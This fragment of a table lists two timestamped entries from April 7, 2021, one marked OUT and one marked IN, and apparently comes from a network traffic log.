---|---|---|---|
Apr 7, 2021 00:40:04.807867050 CEST | 0 | OUT | |
Apr 7, 2021 00:40:05.259238005 CEST | 2 | IN |